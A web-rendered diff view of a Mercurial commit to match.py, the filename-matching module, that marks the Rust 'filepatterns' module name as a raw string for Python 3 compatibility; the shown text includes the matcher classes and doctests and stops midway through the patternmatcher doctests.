##// END OF EJS Templates
py3: do not convert rust module/attribute names to bytes...
Yuya Nishihara -
r43034:e94c8f58 default
parent child Browse files
Show More
@@ -1,1526 +1,1526 b''
1 # match.py - filename matching
1 # match.py - filename matching
2 #
2 #
3 # Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import, print_function
8 from __future__ import absolute_import, print_function
9
9
10 import copy
10 import copy
11 import itertools
11 import itertools
12 import os
12 import os
13 import re
13 import re
14
14
15 from .i18n import _
15 from .i18n import _
16 from . import (
16 from . import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pathutil,
19 pathutil,
20 policy,
20 policy,
21 pycompat,
21 pycompat,
22 util,
22 util,
23 )
23 )
24 from .utils import (
24 from .utils import (
25 stringutil,
25 stringutil,
26 )
26 )
27
27
28 rustmod = policy.importrust('filepatterns')
28 rustmod = policy.importrust(r'filepatterns')
29
29
30 allpatternkinds = ('re', 'glob', 'path', 'relglob', 'relpath', 'relre',
30 allpatternkinds = ('re', 'glob', 'path', 'relglob', 'relpath', 'relre',
31 'rootglob',
31 'rootglob',
32 'listfile', 'listfile0', 'set', 'include', 'subinclude',
32 'listfile', 'listfile0', 'set', 'include', 'subinclude',
33 'rootfilesin')
33 'rootfilesin')
34 cwdrelativepatternkinds = ('relpath', 'glob')
34 cwdrelativepatternkinds = ('relpath', 'glob')
35
35
36 propertycache = util.propertycache
36 propertycache = util.propertycache
37
37
38 def _rematcher(regex):
38 def _rematcher(regex):
39 '''compile the regexp with the best available regexp engine and return a
39 '''compile the regexp with the best available regexp engine and return a
40 matcher function'''
40 matcher function'''
41 m = util.re.compile(regex)
41 m = util.re.compile(regex)
42 try:
42 try:
43 # slightly faster, provided by facebook's re2 bindings
43 # slightly faster, provided by facebook's re2 bindings
44 return m.test_match
44 return m.test_match
45 except AttributeError:
45 except AttributeError:
46 return m.match
46 return m.match
47
47
48 def _expandsets(kindpats, ctx=None, listsubrepos=False, badfn=None):
48 def _expandsets(kindpats, ctx=None, listsubrepos=False, badfn=None):
49 '''Returns the kindpats list with the 'set' patterns expanded to matchers'''
49 '''Returns the kindpats list with the 'set' patterns expanded to matchers'''
50 matchers = []
50 matchers = []
51 other = []
51 other = []
52
52
53 for kind, pat, source in kindpats:
53 for kind, pat, source in kindpats:
54 if kind == 'set':
54 if kind == 'set':
55 if ctx is None:
55 if ctx is None:
56 raise error.ProgrammingError("fileset expression with no "
56 raise error.ProgrammingError("fileset expression with no "
57 "context")
57 "context")
58 matchers.append(ctx.matchfileset(pat, badfn=badfn))
58 matchers.append(ctx.matchfileset(pat, badfn=badfn))
59
59
60 if listsubrepos:
60 if listsubrepos:
61 for subpath in ctx.substate:
61 for subpath in ctx.substate:
62 sm = ctx.sub(subpath).matchfileset(pat, badfn=badfn)
62 sm = ctx.sub(subpath).matchfileset(pat, badfn=badfn)
63 pm = prefixdirmatcher(subpath, sm, badfn=badfn)
63 pm = prefixdirmatcher(subpath, sm, badfn=badfn)
64 matchers.append(pm)
64 matchers.append(pm)
65
65
66 continue
66 continue
67 other.append((kind, pat, source))
67 other.append((kind, pat, source))
68 return matchers, other
68 return matchers, other
69
69
70 def _expandsubinclude(kindpats, root):
70 def _expandsubinclude(kindpats, root):
71 '''Returns the list of subinclude matcher args and the kindpats without the
71 '''Returns the list of subinclude matcher args and the kindpats without the
72 subincludes in it.'''
72 subincludes in it.'''
73 relmatchers = []
73 relmatchers = []
74 other = []
74 other = []
75
75
76 for kind, pat, source in kindpats:
76 for kind, pat, source in kindpats:
77 if kind == 'subinclude':
77 if kind == 'subinclude':
78 sourceroot = pathutil.dirname(util.normpath(source))
78 sourceroot = pathutil.dirname(util.normpath(source))
79 pat = util.pconvert(pat)
79 pat = util.pconvert(pat)
80 path = pathutil.join(sourceroot, pat)
80 path = pathutil.join(sourceroot, pat)
81
81
82 newroot = pathutil.dirname(path)
82 newroot = pathutil.dirname(path)
83 matcherargs = (newroot, '', [], ['include:%s' % path])
83 matcherargs = (newroot, '', [], ['include:%s' % path])
84
84
85 prefix = pathutil.canonpath(root, root, newroot)
85 prefix = pathutil.canonpath(root, root, newroot)
86 if prefix:
86 if prefix:
87 prefix += '/'
87 prefix += '/'
88 relmatchers.append((prefix, matcherargs))
88 relmatchers.append((prefix, matcherargs))
89 else:
89 else:
90 other.append((kind, pat, source))
90 other.append((kind, pat, source))
91
91
92 return relmatchers, other
92 return relmatchers, other
93
93
94 def _kindpatsalwaysmatch(kindpats):
94 def _kindpatsalwaysmatch(kindpats):
95 """"Checks whether the kindspats match everything, as e.g.
95 """"Checks whether the kindspats match everything, as e.g.
96 'relpath:.' does.
96 'relpath:.' does.
97 """
97 """
98 for kind, pat, source in kindpats:
98 for kind, pat, source in kindpats:
99 if pat != '' or kind not in ['relpath', 'glob']:
99 if pat != '' or kind not in ['relpath', 'glob']:
100 return False
100 return False
101 return True
101 return True
102
102
103 def _buildkindpatsmatcher(matchercls, root, kindpats, ctx=None,
103 def _buildkindpatsmatcher(matchercls, root, kindpats, ctx=None,
104 listsubrepos=False, badfn=None):
104 listsubrepos=False, badfn=None):
105 matchers = []
105 matchers = []
106 fms, kindpats = _expandsets(kindpats, ctx=ctx,
106 fms, kindpats = _expandsets(kindpats, ctx=ctx,
107 listsubrepos=listsubrepos, badfn=badfn)
107 listsubrepos=listsubrepos, badfn=badfn)
108 if kindpats:
108 if kindpats:
109 m = matchercls(root, kindpats, badfn=badfn)
109 m = matchercls(root, kindpats, badfn=badfn)
110 matchers.append(m)
110 matchers.append(m)
111 if fms:
111 if fms:
112 matchers.extend(fms)
112 matchers.extend(fms)
113 if not matchers:
113 if not matchers:
114 return nevermatcher(badfn=badfn)
114 return nevermatcher(badfn=badfn)
115 if len(matchers) == 1:
115 if len(matchers) == 1:
116 return matchers[0]
116 return matchers[0]
117 return unionmatcher(matchers)
117 return unionmatcher(matchers)
118
118
119 def match(root, cwd, patterns=None, include=None, exclude=None, default='glob',
119 def match(root, cwd, patterns=None, include=None, exclude=None, default='glob',
120 auditor=None, ctx=None, listsubrepos=False, warn=None,
120 auditor=None, ctx=None, listsubrepos=False, warn=None,
121 badfn=None, icasefs=False):
121 badfn=None, icasefs=False):
122 r"""build an object to match a set of file patterns
122 r"""build an object to match a set of file patterns
123
123
124 arguments:
124 arguments:
125 root - the canonical root of the tree you're matching against
125 root - the canonical root of the tree you're matching against
126 cwd - the current working directory, if relevant
126 cwd - the current working directory, if relevant
127 patterns - patterns to find
127 patterns - patterns to find
128 include - patterns to include (unless they are excluded)
128 include - patterns to include (unless they are excluded)
129 exclude - patterns to exclude (even if they are included)
129 exclude - patterns to exclude (even if they are included)
130 default - if a pattern in patterns has no explicit type, assume this one
130 default - if a pattern in patterns has no explicit type, assume this one
131 auditor - optional path auditor
131 auditor - optional path auditor
132 ctx - optional changecontext
132 ctx - optional changecontext
133 listsubrepos - if True, recurse into subrepositories
133 listsubrepos - if True, recurse into subrepositories
134 warn - optional function used for printing warnings
134 warn - optional function used for printing warnings
135 badfn - optional bad() callback for this matcher instead of the default
135 badfn - optional bad() callback for this matcher instead of the default
136 icasefs - make a matcher for wdir on case insensitive filesystems, which
136 icasefs - make a matcher for wdir on case insensitive filesystems, which
137 normalizes the given patterns to the case in the filesystem
137 normalizes the given patterns to the case in the filesystem
138
138
139 a pattern is one of:
139 a pattern is one of:
140 'glob:<glob>' - a glob relative to cwd
140 'glob:<glob>' - a glob relative to cwd
141 're:<regexp>' - a regular expression
141 're:<regexp>' - a regular expression
142 'path:<path>' - a path relative to repository root, which is matched
142 'path:<path>' - a path relative to repository root, which is matched
143 recursively
143 recursively
144 'rootfilesin:<path>' - a path relative to repository root, which is
144 'rootfilesin:<path>' - a path relative to repository root, which is
145 matched non-recursively (will not match subdirectories)
145 matched non-recursively (will not match subdirectories)
146 'relglob:<glob>' - an unrooted glob (*.c matches C files in all dirs)
146 'relglob:<glob>' - an unrooted glob (*.c matches C files in all dirs)
147 'relpath:<path>' - a path relative to cwd
147 'relpath:<path>' - a path relative to cwd
148 'relre:<regexp>' - a regexp that needn't match the start of a name
148 'relre:<regexp>' - a regexp that needn't match the start of a name
149 'set:<fileset>' - a fileset expression
149 'set:<fileset>' - a fileset expression
150 'include:<path>' - a file of patterns to read and include
150 'include:<path>' - a file of patterns to read and include
151 'subinclude:<path>' - a file of patterns to match against files under
151 'subinclude:<path>' - a file of patterns to match against files under
152 the same directory
152 the same directory
153 '<something>' - a pattern of the specified default type
153 '<something>' - a pattern of the specified default type
154
154
155 Usually a patternmatcher is returned:
155 Usually a patternmatcher is returned:
156 >>> match(b'foo', b'.', [b're:.*\.c$', b'path:foo/a', b'*.py'])
156 >>> match(b'foo', b'.', [b're:.*\.c$', b'path:foo/a', b'*.py'])
157 <patternmatcher patterns='.*\\.c$|foo/a(?:/|$)|[^/]*\\.py$'>
157 <patternmatcher patterns='.*\\.c$|foo/a(?:/|$)|[^/]*\\.py$'>
158
158
159 Combining 'patterns' with 'include' (resp. 'exclude') gives an
159 Combining 'patterns' with 'include' (resp. 'exclude') gives an
160 intersectionmatcher (resp. a differencematcher):
160 intersectionmatcher (resp. a differencematcher):
161 >>> type(match(b'foo', b'.', [b're:.*\.c$'], include=[b'path:lib']))
161 >>> type(match(b'foo', b'.', [b're:.*\.c$'], include=[b'path:lib']))
162 <class 'mercurial.match.intersectionmatcher'>
162 <class 'mercurial.match.intersectionmatcher'>
163 >>> type(match(b'foo', b'.', [b're:.*\.c$'], exclude=[b'path:build']))
163 >>> type(match(b'foo', b'.', [b're:.*\.c$'], exclude=[b'path:build']))
164 <class 'mercurial.match.differencematcher'>
164 <class 'mercurial.match.differencematcher'>
165
165
166 Notice that, if 'patterns' is empty, an alwaysmatcher is returned:
166 Notice that, if 'patterns' is empty, an alwaysmatcher is returned:
167 >>> match(b'foo', b'.', [])
167 >>> match(b'foo', b'.', [])
168 <alwaysmatcher>
168 <alwaysmatcher>
169
169
170 The 'default' argument determines which kind of pattern is assumed if a
170 The 'default' argument determines which kind of pattern is assumed if a
171 pattern has no prefix:
171 pattern has no prefix:
172 >>> match(b'foo', b'.', [b'.*\.c$'], default=b're')
172 >>> match(b'foo', b'.', [b'.*\.c$'], default=b're')
173 <patternmatcher patterns='.*\\.c$'>
173 <patternmatcher patterns='.*\\.c$'>
174 >>> match(b'foo', b'.', [b'main.py'], default=b'relpath')
174 >>> match(b'foo', b'.', [b'main.py'], default=b'relpath')
175 <patternmatcher patterns='main\\.py(?:/|$)'>
175 <patternmatcher patterns='main\\.py(?:/|$)'>
176 >>> match(b'foo', b'.', [b'main.py'], default=b're')
176 >>> match(b'foo', b'.', [b'main.py'], default=b're')
177 <patternmatcher patterns='main.py'>
177 <patternmatcher patterns='main.py'>
178
178
179 The primary use of matchers is to check whether a value (usually a file
179 The primary use of matchers is to check whether a value (usually a file
180 name) matches againset one of the patterns given at initialization. There
180 name) matches againset one of the patterns given at initialization. There
181 are two ways of doing this check.
181 are two ways of doing this check.
182
182
183 >>> m = match(b'foo', b'', [b're:.*\.c$', b'relpath:a'])
183 >>> m = match(b'foo', b'', [b're:.*\.c$', b'relpath:a'])
184
184
185 1. Calling the matcher with a file name returns True if any pattern
185 1. Calling the matcher with a file name returns True if any pattern
186 matches that file name:
186 matches that file name:
187 >>> m(b'a')
187 >>> m(b'a')
188 True
188 True
189 >>> m(b'main.c')
189 >>> m(b'main.c')
190 True
190 True
191 >>> m(b'test.py')
191 >>> m(b'test.py')
192 False
192 False
193
193
194 2. Using the exact() method only returns True if the file name matches one
194 2. Using the exact() method only returns True if the file name matches one
195 of the exact patterns (i.e. not re: or glob: patterns):
195 of the exact patterns (i.e. not re: or glob: patterns):
196 >>> m.exact(b'a')
196 >>> m.exact(b'a')
197 True
197 True
198 >>> m.exact(b'main.c')
198 >>> m.exact(b'main.c')
199 False
199 False
200 """
200 """
201 normalize = _donormalize
201 normalize = _donormalize
202 if icasefs:
202 if icasefs:
203 dirstate = ctx.repo().dirstate
203 dirstate = ctx.repo().dirstate
204 dsnormalize = dirstate.normalize
204 dsnormalize = dirstate.normalize
205
205
206 def normalize(patterns, default, root, cwd, auditor, warn):
206 def normalize(patterns, default, root, cwd, auditor, warn):
207 kp = _donormalize(patterns, default, root, cwd, auditor, warn)
207 kp = _donormalize(patterns, default, root, cwd, auditor, warn)
208 kindpats = []
208 kindpats = []
209 for kind, pats, source in kp:
209 for kind, pats, source in kp:
210 if kind not in ('re', 'relre'): # regex can't be normalized
210 if kind not in ('re', 'relre'): # regex can't be normalized
211 p = pats
211 p = pats
212 pats = dsnormalize(pats)
212 pats = dsnormalize(pats)
213
213
214 # Preserve the original to handle a case only rename.
214 # Preserve the original to handle a case only rename.
215 if p != pats and p in dirstate:
215 if p != pats and p in dirstate:
216 kindpats.append((kind, p, source))
216 kindpats.append((kind, p, source))
217
217
218 kindpats.append((kind, pats, source))
218 kindpats.append((kind, pats, source))
219 return kindpats
219 return kindpats
220
220
221 if patterns:
221 if patterns:
222 kindpats = normalize(patterns, default, root, cwd, auditor, warn)
222 kindpats = normalize(patterns, default, root, cwd, auditor, warn)
223 if _kindpatsalwaysmatch(kindpats):
223 if _kindpatsalwaysmatch(kindpats):
224 m = alwaysmatcher(badfn)
224 m = alwaysmatcher(badfn)
225 else:
225 else:
226 m = _buildkindpatsmatcher(patternmatcher, root, kindpats, ctx=ctx,
226 m = _buildkindpatsmatcher(patternmatcher, root, kindpats, ctx=ctx,
227 listsubrepos=listsubrepos, badfn=badfn)
227 listsubrepos=listsubrepos, badfn=badfn)
228 else:
228 else:
229 # It's a little strange that no patterns means to match everything.
229 # It's a little strange that no patterns means to match everything.
230 # Consider changing this to match nothing (probably using nevermatcher).
230 # Consider changing this to match nothing (probably using nevermatcher).
231 m = alwaysmatcher(badfn)
231 m = alwaysmatcher(badfn)
232
232
233 if include:
233 if include:
234 kindpats = normalize(include, 'glob', root, cwd, auditor, warn)
234 kindpats = normalize(include, 'glob', root, cwd, auditor, warn)
235 im = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
235 im = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
236 listsubrepos=listsubrepos, badfn=None)
236 listsubrepos=listsubrepos, badfn=None)
237 m = intersectmatchers(m, im)
237 m = intersectmatchers(m, im)
238 if exclude:
238 if exclude:
239 kindpats = normalize(exclude, 'glob', root, cwd, auditor, warn)
239 kindpats = normalize(exclude, 'glob', root, cwd, auditor, warn)
240 em = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
240 em = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
241 listsubrepos=listsubrepos, badfn=None)
241 listsubrepos=listsubrepos, badfn=None)
242 m = differencematcher(m, em)
242 m = differencematcher(m, em)
243 return m
243 return m
244
244
245 def exact(files, badfn=None):
245 def exact(files, badfn=None):
246 return exactmatcher(files, badfn=badfn)
246 return exactmatcher(files, badfn=badfn)
247
247
248 def always(badfn=None):
248 def always(badfn=None):
249 return alwaysmatcher(badfn)
249 return alwaysmatcher(badfn)
250
250
251 def never(badfn=None):
251 def never(badfn=None):
252 return nevermatcher(badfn)
252 return nevermatcher(badfn)
253
253
254 def badmatch(match, badfn):
254 def badmatch(match, badfn):
255 """Make a copy of the given matcher, replacing its bad method with the given
255 """Make a copy of the given matcher, replacing its bad method with the given
256 one.
256 one.
257 """
257 """
258 m = copy.copy(match)
258 m = copy.copy(match)
259 m.bad = badfn
259 m.bad = badfn
260 return m
260 return m
261
261
262 def _donormalize(patterns, default, root, cwd, auditor=None, warn=None):
262 def _donormalize(patterns, default, root, cwd, auditor=None, warn=None):
263 '''Convert 'kind:pat' from the patterns list to tuples with kind and
263 '''Convert 'kind:pat' from the patterns list to tuples with kind and
264 normalized and rooted patterns and with listfiles expanded.'''
264 normalized and rooted patterns and with listfiles expanded.'''
265 kindpats = []
265 kindpats = []
266 for kind, pat in [_patsplit(p, default) for p in patterns]:
266 for kind, pat in [_patsplit(p, default) for p in patterns]:
267 if kind in cwdrelativepatternkinds:
267 if kind in cwdrelativepatternkinds:
268 pat = pathutil.canonpath(root, cwd, pat, auditor=auditor)
268 pat = pathutil.canonpath(root, cwd, pat, auditor=auditor)
269 elif kind in ('relglob', 'path', 'rootfilesin', 'rootglob'):
269 elif kind in ('relglob', 'path', 'rootfilesin', 'rootglob'):
270 pat = util.normpath(pat)
270 pat = util.normpath(pat)
271 elif kind in ('listfile', 'listfile0'):
271 elif kind in ('listfile', 'listfile0'):
272 try:
272 try:
273 files = util.readfile(pat)
273 files = util.readfile(pat)
274 if kind == 'listfile0':
274 if kind == 'listfile0':
275 files = files.split('\0')
275 files = files.split('\0')
276 else:
276 else:
277 files = files.splitlines()
277 files = files.splitlines()
278 files = [f for f in files if f]
278 files = [f for f in files if f]
279 except EnvironmentError:
279 except EnvironmentError:
280 raise error.Abort(_("unable to read file list (%s)") % pat)
280 raise error.Abort(_("unable to read file list (%s)") % pat)
281 for k, p, source in _donormalize(files, default, root, cwd,
281 for k, p, source in _donormalize(files, default, root, cwd,
282 auditor, warn):
282 auditor, warn):
283 kindpats.append((k, p, pat))
283 kindpats.append((k, p, pat))
284 continue
284 continue
285 elif kind == 'include':
285 elif kind == 'include':
286 try:
286 try:
287 fullpath = os.path.join(root, util.localpath(pat))
287 fullpath = os.path.join(root, util.localpath(pat))
288 includepats = readpatternfile(fullpath, warn)
288 includepats = readpatternfile(fullpath, warn)
289 for k, p, source in _donormalize(includepats, default,
289 for k, p, source in _donormalize(includepats, default,
290 root, cwd, auditor, warn):
290 root, cwd, auditor, warn):
291 kindpats.append((k, p, source or pat))
291 kindpats.append((k, p, source or pat))
292 except error.Abort as inst:
292 except error.Abort as inst:
293 raise error.Abort('%s: %s' % (pat, inst[0]))
293 raise error.Abort('%s: %s' % (pat, inst[0]))
294 except IOError as inst:
294 except IOError as inst:
295 if warn:
295 if warn:
296 warn(_("skipping unreadable pattern file '%s': %s\n") %
296 warn(_("skipping unreadable pattern file '%s': %s\n") %
297 (pat, stringutil.forcebytestr(inst.strerror)))
297 (pat, stringutil.forcebytestr(inst.strerror)))
298 continue
298 continue
299 # else: re or relre - which cannot be normalized
299 # else: re or relre - which cannot be normalized
300 kindpats.append((kind, pat, ''))
300 kindpats.append((kind, pat, ''))
301 return kindpats
301 return kindpats
302
302
303 class basematcher(object):
303 class basematcher(object):
304
304
305 def __init__(self, badfn=None):
305 def __init__(self, badfn=None):
306 if badfn is not None:
306 if badfn is not None:
307 self.bad = badfn
307 self.bad = badfn
308
308
309 def __call__(self, fn):
309 def __call__(self, fn):
310 return self.matchfn(fn)
310 return self.matchfn(fn)
311 # Callbacks related to how the matcher is used by dirstate.walk.
311 # Callbacks related to how the matcher is used by dirstate.walk.
312 # Subscribers to these events must monkeypatch the matcher object.
312 # Subscribers to these events must monkeypatch the matcher object.
313 def bad(self, f, msg):
313 def bad(self, f, msg):
314 '''Callback from dirstate.walk for each explicit file that can't be
314 '''Callback from dirstate.walk for each explicit file that can't be
315 found/accessed, with an error message.'''
315 found/accessed, with an error message.'''
316
316
317 # If an explicitdir is set, it will be called when an explicitly listed
317 # If an explicitdir is set, it will be called when an explicitly listed
318 # directory is visited.
318 # directory is visited.
319 explicitdir = None
319 explicitdir = None
320
320
321 # If an traversedir is set, it will be called when a directory discovered
321 # If an traversedir is set, it will be called when a directory discovered
322 # by recursive traversal is visited.
322 # by recursive traversal is visited.
323 traversedir = None
323 traversedir = None
324
324
325 @propertycache
325 @propertycache
326 def _files(self):
326 def _files(self):
327 return []
327 return []
328
328
329 def files(self):
329 def files(self):
330 '''Explicitly listed files or patterns or roots:
330 '''Explicitly listed files or patterns or roots:
331 if no patterns or .always(): empty list,
331 if no patterns or .always(): empty list,
332 if exact: list exact files,
332 if exact: list exact files,
333 if not .anypats(): list all files and dirs,
333 if not .anypats(): list all files and dirs,
334 else: optimal roots'''
334 else: optimal roots'''
335 return self._files
335 return self._files
336
336
337 @propertycache
337 @propertycache
338 def _fileset(self):
338 def _fileset(self):
339 return set(self._files)
339 return set(self._files)
340
340
341 def exact(self, f):
341 def exact(self, f):
342 '''Returns True if f is in .files().'''
342 '''Returns True if f is in .files().'''
343 return f in self._fileset
343 return f in self._fileset
344
344
345 def matchfn(self, f):
345 def matchfn(self, f):
346 return False
346 return False
347
347
348 def visitdir(self, dir):
348 def visitdir(self, dir):
349 '''Decides whether a directory should be visited based on whether it
349 '''Decides whether a directory should be visited based on whether it
350 has potential matches in it or one of its subdirectories. This is
350 has potential matches in it or one of its subdirectories. This is
351 based on the match's primary, included, and excluded patterns.
351 based on the match's primary, included, and excluded patterns.
352
352
353 Returns the string 'all' if the given directory and all subdirectories
353 Returns the string 'all' if the given directory and all subdirectories
354 should be visited. Otherwise returns True or False indicating whether
354 should be visited. Otherwise returns True or False indicating whether
355 the given directory should be visited.
355 the given directory should be visited.
356 '''
356 '''
357 return True
357 return True
358
358
359 def visitchildrenset(self, dir):
359 def visitchildrenset(self, dir):
360 '''Decides whether a directory should be visited based on whether it
360 '''Decides whether a directory should be visited based on whether it
361 has potential matches in it or one of its subdirectories, and
361 has potential matches in it or one of its subdirectories, and
362 potentially lists which subdirectories of that directory should be
362 potentially lists which subdirectories of that directory should be
363 visited. This is based on the match's primary, included, and excluded
363 visited. This is based on the match's primary, included, and excluded
364 patterns.
364 patterns.
365
365
366 This function is very similar to 'visitdir', and the following mapping
366 This function is very similar to 'visitdir', and the following mapping
367 can be applied:
367 can be applied:
368
368
369 visitdir | visitchildrenlist
369 visitdir | visitchildrenlist
370 ----------+-------------------
370 ----------+-------------------
371 False | set()
371 False | set()
372 'all' | 'all'
372 'all' | 'all'
373 True | 'this' OR non-empty set of subdirs -or files- to visit
373 True | 'this' OR non-empty set of subdirs -or files- to visit
374
374
375 Example:
375 Example:
376 Assume matchers ['path:foo/bar', 'rootfilesin:qux'], we would return
376 Assume matchers ['path:foo/bar', 'rootfilesin:qux'], we would return
377 the following values (assuming the implementation of visitchildrenset
377 the following values (assuming the implementation of visitchildrenset
378 is capable of recognizing this; some implementations are not).
378 is capable of recognizing this; some implementations are not).
379
379
380 '' -> {'foo', 'qux'}
380 '' -> {'foo', 'qux'}
381 'baz' -> set()
381 'baz' -> set()
382 'foo' -> {'bar'}
382 'foo' -> {'bar'}
383 # Ideally this would be 'all', but since the prefix nature of matchers
383 # Ideally this would be 'all', but since the prefix nature of matchers
384 # is applied to the entire matcher, we have to downgrade this to
384 # is applied to the entire matcher, we have to downgrade this to
385 # 'this' due to the non-prefix 'rootfilesin'-kind matcher being mixed
385 # 'this' due to the non-prefix 'rootfilesin'-kind matcher being mixed
386 # in.
386 # in.
387 'foo/bar' -> 'this'
387 'foo/bar' -> 'this'
388 'qux' -> 'this'
388 'qux' -> 'this'
389
389
390 Important:
390 Important:
391 Most matchers do not know if they're representing files or
391 Most matchers do not know if they're representing files or
392 directories. They see ['path:dir/f'] and don't know whether 'f' is a
392 directories. They see ['path:dir/f'] and don't know whether 'f' is a
393 file or a directory, so visitchildrenset('dir') for most matchers will
393 file or a directory, so visitchildrenset('dir') for most matchers will
394 return {'f'}, but if the matcher knows it's a file (like exactmatcher
394 return {'f'}, but if the matcher knows it's a file (like exactmatcher
395 does), it may return 'this'. Do not rely on the return being a set
395 does), it may return 'this'. Do not rely on the return being a set
396 indicating that there are no files in this dir to investigate (or
396 indicating that there are no files in this dir to investigate (or
397 equivalently that if there are files to investigate in 'dir' that it
397 equivalently that if there are files to investigate in 'dir' that it
398 will always return 'this').
398 will always return 'this').
399 '''
399 '''
400 return 'this'
400 return 'this'
401
401
402 def always(self):
402 def always(self):
403 '''Matcher will match everything and .files() will be empty --
403 '''Matcher will match everything and .files() will be empty --
404 optimization might be possible.'''
404 optimization might be possible.'''
405 return False
405 return False
406
406
407 def isexact(self):
407 def isexact(self):
408 '''Matcher will match exactly the list of files in .files() --
408 '''Matcher will match exactly the list of files in .files() --
409 optimization might be possible.'''
409 optimization might be possible.'''
410 return False
410 return False
411
411
412 def prefix(self):
412 def prefix(self):
413 '''Matcher will match the paths in .files() recursively --
413 '''Matcher will match the paths in .files() recursively --
414 optimization might be possible.'''
414 optimization might be possible.'''
415 return False
415 return False
416
416
417 def anypats(self):
417 def anypats(self):
418 '''None of .always(), .isexact(), and .prefix() is true --
418 '''None of .always(), .isexact(), and .prefix() is true --
419 optimizations will be difficult.'''
419 optimizations will be difficult.'''
420 return not self.always() and not self.isexact() and not self.prefix()
420 return not self.always() and not self.isexact() and not self.prefix()
421
421
422 class alwaysmatcher(basematcher):
422 class alwaysmatcher(basematcher):
423 '''Matches everything.'''
423 '''Matches everything.'''
424
424
425 def __init__(self, badfn=None):
425 def __init__(self, badfn=None):
426 super(alwaysmatcher, self).__init__(badfn)
426 super(alwaysmatcher, self).__init__(badfn)
427
427
428 def always(self):
428 def always(self):
429 return True
429 return True
430
430
431 def matchfn(self, f):
431 def matchfn(self, f):
432 return True
432 return True
433
433
434 def visitdir(self, dir):
434 def visitdir(self, dir):
435 return 'all'
435 return 'all'
436
436
437 def visitchildrenset(self, dir):
437 def visitchildrenset(self, dir):
438 return 'all'
438 return 'all'
439
439
440 def __repr__(self):
440 def __repr__(self):
441 return r'<alwaysmatcher>'
441 return r'<alwaysmatcher>'
442
442
443 class nevermatcher(basematcher):
443 class nevermatcher(basematcher):
444 '''Matches nothing.'''
444 '''Matches nothing.'''
445
445
446 def __init__(self, badfn=None):
446 def __init__(self, badfn=None):
447 super(nevermatcher, self).__init__(badfn)
447 super(nevermatcher, self).__init__(badfn)
448
448
449 # It's a little weird to say that the nevermatcher is an exact matcher
449 # It's a little weird to say that the nevermatcher is an exact matcher
450 # or a prefix matcher, but it seems to make sense to let callers take
450 # or a prefix matcher, but it seems to make sense to let callers take
451 # fast paths based on either. There will be no exact matches, nor any
451 # fast paths based on either. There will be no exact matches, nor any
452 # prefixes (files() returns []), so fast paths iterating over them should
452 # prefixes (files() returns []), so fast paths iterating over them should
453 # be efficient (and correct).
453 # be efficient (and correct).
454 def isexact(self):
454 def isexact(self):
455 return True
455 return True
456
456
457 def prefix(self):
457 def prefix(self):
458 return True
458 return True
459
459
460 def visitdir(self, dir):
460 def visitdir(self, dir):
461 return False
461 return False
462
462
463 def visitchildrenset(self, dir):
463 def visitchildrenset(self, dir):
464 return set()
464 return set()
465
465
466 def __repr__(self):
466 def __repr__(self):
467 return r'<nevermatcher>'
467 return r'<nevermatcher>'
468
468
469 class predicatematcher(basematcher):
469 class predicatematcher(basematcher):
470 """A matcher adapter for a simple boolean function"""
470 """A matcher adapter for a simple boolean function"""
471
471
472 def __init__(self, predfn, predrepr=None, badfn=None):
472 def __init__(self, predfn, predrepr=None, badfn=None):
473 super(predicatematcher, self).__init__(badfn)
473 super(predicatematcher, self).__init__(badfn)
474 self.matchfn = predfn
474 self.matchfn = predfn
475 self._predrepr = predrepr
475 self._predrepr = predrepr
476
476
477 @encoding.strmethod
477 @encoding.strmethod
478 def __repr__(self):
478 def __repr__(self):
479 s = (stringutil.buildrepr(self._predrepr)
479 s = (stringutil.buildrepr(self._predrepr)
480 or pycompat.byterepr(self.matchfn))
480 or pycompat.byterepr(self.matchfn))
481 return '<predicatenmatcher pred=%s>' % s
481 return '<predicatenmatcher pred=%s>' % s
482
482
483 def normalizerootdir(dir, funcname):
483 def normalizerootdir(dir, funcname):
484 if dir == '.':
484 if dir == '.':
485 util.nouideprecwarn("match.%s() no longer accepts "
485 util.nouideprecwarn("match.%s() no longer accepts "
486 "'.', use '' instead." % funcname, '5.1')
486 "'.', use '' instead." % funcname, '5.1')
487 return ''
487 return ''
488 return dir
488 return dir
489
489
490
490
491 class patternmatcher(basematcher):
491 class patternmatcher(basematcher):
492 """Matches a set of (kind, pat, source) against a 'root' directory.
492 """Matches a set of (kind, pat, source) against a 'root' directory.
493
493
494 >>> kindpats = [
494 >>> kindpats = [
495 ... (b're', br'.*\.c$', b''),
495 ... (b're', br'.*\.c$', b''),
496 ... (b'path', b'foo/a', b''),
496 ... (b'path', b'foo/a', b''),
497 ... (b'relpath', b'b', b''),
497 ... (b'relpath', b'b', b''),
498 ... (b'glob', b'*.h', b''),
498 ... (b'glob', b'*.h', b''),
499 ... ]
499 ... ]
500 >>> m = patternmatcher(b'foo', kindpats)
500 >>> m = patternmatcher(b'foo', kindpats)
501 >>> m(b'main.c') # matches re:.*\.c$
501 >>> m(b'main.c') # matches re:.*\.c$
502 True
502 True
503 >>> m(b'b.txt')
503 >>> m(b'b.txt')
504 False
504 False
505 >>> m(b'foo/a') # matches path:foo/a
505 >>> m(b'foo/a') # matches path:foo/a
506 True
506 True
507 >>> m(b'a') # does not match path:b, since 'root' is 'foo'
507 >>> m(b'a') # does not match path:b, since 'root' is 'foo'
508 False
508 False
509 >>> m(b'b') # matches relpath:b, since 'root' is 'foo'
509 >>> m(b'b') # matches relpath:b, since 'root' is 'foo'
510 True
510 True
511 >>> m(b'lib.h') # matches glob:*.h
511 >>> m(b'lib.h') # matches glob:*.h
512 True
512 True
513
513
514 >>> m.files()
514 >>> m.files()
515 ['', 'foo/a', 'b', '']
515 ['', 'foo/a', 'b', '']
516 >>> m.exact(b'foo/a')
516 >>> m.exact(b'foo/a')
517 True
517 True
518 >>> m.exact(b'b')
518 >>> m.exact(b'b')
519 True
519 True
520 >>> m.exact(b'lib.h') # exact matches are for (rel)path kinds
520 >>> m.exact(b'lib.h') # exact matches are for (rel)path kinds
521 False
